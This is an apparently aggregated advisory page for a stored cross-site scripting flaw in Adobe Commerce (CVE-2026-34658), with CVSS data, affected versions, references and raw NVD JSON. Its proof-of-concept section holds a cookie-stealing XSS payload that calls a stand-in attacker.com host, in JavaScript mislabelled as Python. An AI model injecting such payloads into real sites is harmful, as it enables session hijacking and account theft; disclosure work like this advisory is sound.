CVE-2026-34658

Description

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Adobe Commerce 2.4.9-beta1及更早版本

Adobe Commerce 2.4.8-p4及更早版本

Adobe Commerce 2.4.7-p9及更早版本

Adobe Commerce 2.4.6-p14及更早版本

Adobe Commerce 2.4.5-p16及更早版本

Adobe Commerce 2.4.4-p17及更早版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Proof of Concept for Stored XSS in Adobe Commerce
// Attack vector: Injecting payload into a vulnerable product field (e.g., Name or Description)

function exploit() {
    // The malicious payload to be stored
    // This script captures the document cookie and sends it to an attacker-controlled server
    var payload = '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>';
    
    // Simulate a POST request to the product update endpoint
    // Note: Actual endpoint URL and parameters depend on the specific vulnerable version
    var formData = {
        'product[name]': payload,
        'product[description]': 'Malicious Product',
        'form_key': 'FORM_KEY_HERE' // Administrator's form key is required for authentication
    };

    // In a real scenario, the attacker uses the high-privileged session to submit this data
    console.log("Sending payload to backend:", formData);
    // fetch('/admin/catalog/product/save/id/1', { method: 'POST', body: formData });
}

// Trigger the exploit function
exploit();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34658
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34658
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34658/
[4] VulDB https://vuldb.com/cve/CVE-2026-34658
[5] https://helpx.adobe.com/security/products/magento/apsb26-49.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34658", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:36.833", "lastModified": "2026-05-13T14:49:11.830", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://helpx.adobe.com/security/products/magento/apsb26-49.html", "source": "[email protected]"}]}}